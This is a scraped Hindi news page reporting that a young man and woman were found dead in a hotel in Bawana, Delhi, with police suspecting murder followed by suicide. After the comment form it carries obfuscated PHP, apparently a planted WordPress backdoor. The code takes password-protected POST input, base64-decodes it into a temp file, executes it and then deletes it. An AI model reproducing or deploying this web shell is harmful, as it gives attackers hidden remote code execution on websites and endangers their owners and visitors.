Delhi: होटल में मिली लड़की-लड़के की लाश, पुलिस जाँच में जुटी

राजधानी दिल्ली के बवाना के एक होटल में 21 साल के लड़के और 21 साल की ही लड़की की लाश मिली है. पुलिस के मुताबिक लड़की के गले पर कट का निशान है, जबकि लड़के के मुंह से झाग निकल रहा था. दिल्ली पुलिस ने दोनों लाशों को कब्जे में लेकर कमरे को सील कर दिया है और दोनों लाशों को पोस्टमार्टम के लिए भेज दिया है.


दिल्ली पुलिस की शुरुवाती जाँच बताती है कि यह हत्या के बाद आत्महत्या का मामला नजर आ रहा है. उत्तरी बाहरी दिल्ली के डीसीपी देवेश महला के मुताबिक, 10 जनवरी की रात होटल मालिक ने पुलिस से संपर्क किया और बताया कि उनके होटल के एक कमरे में दो लाशें पड़ी हुई है.


होटल मालिक ने बताया कि दोनों की उम्र 21 साल है और दोनों ने सुबह करीब 10 बजे होटल में चेक इन किया था. पुलिस ने मौके पर पहुंचकर देखा कि लड़की के गले पर चोट के निशान थे जबकि लड़के के मुंह से झाग बाहर की तरफ निकला हुआ था, जो कि सूख गया था. इसके अलावा कमरे और बाथरूम में भी उल्टी के सबूत पुलिस को मिले.


पुलिस को होटल के कमरे से सुल्फा पाउडर और खून से सना एक चाकू भी मिला है. मौके पर एफएसएल की टीम को भी बुलाया गया. दिल्ली पुलिस के मुताबिक, पुलिस को शुरुवाती जाँच में लग रहा है कि लड़के ने लड़की की हत्या करने के बाद खुदकुशी कर ली. सीसीटीवी में इन दोनों के अलावा कमरे के अंदर कोई भी आता या जाता हुआ नजर नहीं दिख रहा है।

Read Previous

ड्रोन तकनीकी का हुआ सफल ट्रायल 40 मिनट में दून से उत्तरकाशी पहुंची 400 डोज वैक्सीन

Read Next

Joshimath Crisis:जोशीमठ में मुख्यमंत्री पुष्कर सिंह धामी ने नरसिंह मंदिर में की पूजा अर्चना, हालात का लिया जायजा

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}